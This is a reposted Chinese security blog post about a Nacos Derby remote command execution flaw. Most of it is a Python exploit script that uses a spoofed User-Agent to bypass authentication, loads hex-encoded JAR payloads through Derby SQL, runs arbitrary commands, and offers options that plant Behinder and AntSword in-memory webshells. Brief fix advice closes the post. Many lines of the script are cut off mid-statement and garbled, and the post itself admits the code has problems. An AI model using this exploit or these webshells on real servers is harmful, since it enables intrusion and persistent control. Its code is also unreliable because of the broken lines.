【攻防演练】【HW】【含poc】【含修复建议】Nacos Derby 远程命令执行漏洞

Nacos Derby命令执行漏洞利用脚本，默认使用User-Agent绕过漏洞进行利用https://github.com/Wileysec/nacos_derby_rce
https://github.com/Wileysec/nacos_derby_rce

[以下poc有些问题，推荐去github直接下载]

import sys
import requests
from urllib.parse import urljoin import random
import argparse

class NacosRCE:
    def __init__(self,target,token=''):
        self.removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal')
        self.derby_url = urljoin(target,'/nacos/v1/cs/ops/derby')
        self.console_state_url = urljoin(target,'/nacos/v1/console/server/st         self.access_token = token
        self.headers = {
            "User-Agent": "Nacos-Server"
        }
        if self.access_token != '':
            self.headers['Accesstoken'] = self.access_token
    def getRandomId(self):
        return ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKL

    def check_vul(self):
        req = requests.get(url=self.derby_url,headers=self.headers)
        if "caused: Required request parameter" in req.text and req.status_c             return True
        else:
            return False

    def get_console_info(self):
        req = requests.get(url=self.console_state_url)
        data_json = req.json()
        if req.status_code == 200:
            if 'startup_mode' not in data_json.keys():
                data_json['startup_mode'] = data_json.get("standalone_mode")            return [data_json.get("version"),data_json.get("auth_enabled"),d

    def base_info(self):
        data = self.get_console_info()
        print("[*] Nacos Version: " + data[0] + ", Authentication Required: 

    def javahex_exploit(self,option):
        for i in range(0,sys.maxsize):
            self.id = self.getRandomId()            self.option = option
            self.jar_filename="tmp/tmp"+self.id+".jar"
            self.external_name = self.getExternalName(self.option)            javahex = self.getJavaHex(self.option)

            post_sql = """
            CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(
            CALL sqlj.install_jar('{a4}', 'NACOS.{a5}', 0)
            CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.clas             CREATE FUNCTION S_EXAMPLE_{a7}(PARAM VARCHAR(2000)) RETURNS VARC

            data = {'file':post_sql}
            req = requests.post(url=self.removal_url,files=data,headers=self             data_json = req.json()
            if data_json.get('message',None) is None and data_json.get('data                 print("[+] Execution successful, Vulnerability exists! Funct                 break

        if self.option not in ('1','2'):
            while True:
                cmd = input("Please enter the command you wish to execute (t                 if cmd == 'exit':
                    sys.exit(1)
                self.execute_cmd(cmd)
        else:
            self.execute_cmd("whoami")

    def execute_cmd(self,command):
        get_sql = """select * from (select count(*) as b, S_EXAMPLE_{id}('{c
        req = requests.get(url=self.derby_url + "?sql=" + get_sql,headers=se         data_json = req.json()
        if req.status_code == 200:
            print("[+] Execution result: " + data_json.get("data")[0]['A'])
        else:
            print("[-] Execution error!")

    def getExternalName(self,option):
        if option == '1':
            # 冰蝎内存马
            return "org.apachegv.SignatureUtils.exec"
        elif option == '2':
            # AntSword内存马
            return "TomcatMemoryShell.ConfigurationUtil.exec"        else:
            return "test.poc.Example.exec"

    def getJavaHex(self,option):
        if option == '1':
            # 冰蝎内存马
         return"504b03041400080808004160f2580000000000000000000000001400"
        elif option == '2':            # AntSword内存马
            return "504b0304140008080800a3adf0580000000000000000000000001400
        else:
            # cmd
            
            return "504b0304140008080800f888ec580000000000000000000000001400
    def main(self):
        self.base_info()
        if self.check_vul() == False:
            print("[-] The interface does not allow unauthorized access or t             sys.exit(1)
        while True:
            option = input("Please enter the number of the operation you wis             self.javahex_exploit(option)
            break
if __name__ == '__main__':
    print("""
  _   _                       _____            _            | \ | |                     |  __ \          | |           |  \| | __ _  ___ ___  ___  | |  | | ___ _ __| |__  _   _  | . ` |/ _` |/ __/ _ \/ __| | |  | |/ _ \ '__| '_ \| | | | | |\  | (_| | (_| (_) \__ \ | |__| |  __/ |  | |_) | |_| | |_| \_|\__,_|\___\___/|___/ |_____/ \___|_|  |_.__/ \__, |                                                      __/ |                                                     |___/ 

1.目前官方已经在最新代码中通过默认禁用derby接口的方式对本漏洞进行了修复，修复代码如下所示：
https://github.com/alibaba/nacos/commit/ed7bd03d4c214d68f51654fee3eea7ecf72fd9ab <https://github.com/alibaba/nacos/commit/ed7bd03d4c214d68f51654fee3eea7ecf72fd9a b>
1.开启Nacos derby数据库接口鉴权。具体操作请参考链接：
https://nacos.io/zh-cn/docs/v2/guide/user/auth.html https://nacos.io/zh-cn/docs/v2/guide/user/auth.html

原文地址：https://blog.csdn.net/zzxx191z/article/details/140687614

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！